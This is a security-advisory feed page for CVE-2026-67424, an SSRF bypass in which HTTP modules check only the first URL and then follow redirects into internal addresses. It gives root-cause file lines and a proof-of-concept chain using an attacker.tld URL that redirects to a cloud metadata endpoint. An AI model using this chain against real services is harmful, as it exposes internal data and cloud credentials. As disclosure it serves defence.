CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

CVE-2026-67424

highCVSS 8.5covered by 2 sourcesfirst seen 2026-07-29
Summary The HTTP modules that DO call the SSRF guard (http.get, http.request, http.batch) validate only the initial URL, then issue the request with aiohttp's default allow_redirects=True and perform no per-hop revalidation. An attacker hosts a public URL that 302-redirects to an internal address; the guard passes on the public host and aiohttp transparently follows the redirect into internal space, returning the internal body. Root Cause src/core/modules/atomic/http/get.py:116 calls session.get(url, ...) with no allow_redirects argument → aiohttp default True. request.py:60 sets allow_redirects=follow_redirects (default True at :327); batch.py:57 likewise. A repo grep of http/ for on_request_redirect / response.history returns NONE — there is no redirect interception or Location revalidation. Impact Full readable SSRF that defeats the primary SSRF control on the very modules that correctly validate. Confidentiality of internal/metadata responses (C:H), S:C. Proof of Concept Verified live: http.get with allowlisted base 127.0.0.1 followed a 302 Location: http://127.0.0.2/... (non-allowlisted) and returned INTERNAL-VIA-REDIRECT. attacker hosts http://attacker.tld/r -> 302 Location: http://<cloud-metadata-ip>/latest/meta-data/... execute_module http.get {"url":"http://attacker.tld/r"} Attack Chain 1. Entry: execute_module http.get {url:"http://attacker.tld/r"} (attacker 302->internal). Guard: validate_url_with_env_config(url) (get.py:104). Bypass proof: validation runs on attacker.tld (public) → passes; never re-run on the redirect target. 2. Sink: session.get(url) (get.py:116) — no allow_redirects arg → aiohttp default True. Bypass proof: grep of http/ for on_request_redirect/response.history → NONE. 3. Impact: aiohttp follows 302 to the internal host; internal body returned (get.py:118). Bypass Evidence Live PoC followed a 302 into non-allowlisted loopback and returned the internal marker string. aiohttp ClientSession.get default allow_redirects=True; module n

⚡ Watch CVE-2026-67424

Get an email if CVE-2026-67424 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.

Exploitation outlook

Advisory coverage (2)

External references

NVD record for CVE-2026-67424

CVE.org record

Embed the live status

CVE-2026-67424 live status badge — this badge updates automatically when the KEV or exploit status changes. How to embed it →

[![CVE-2026-67424 status](https://www.csirts.com/badge/CVE-2026-67424)](https://www.csirts.com/cve/CVE-2026-67424)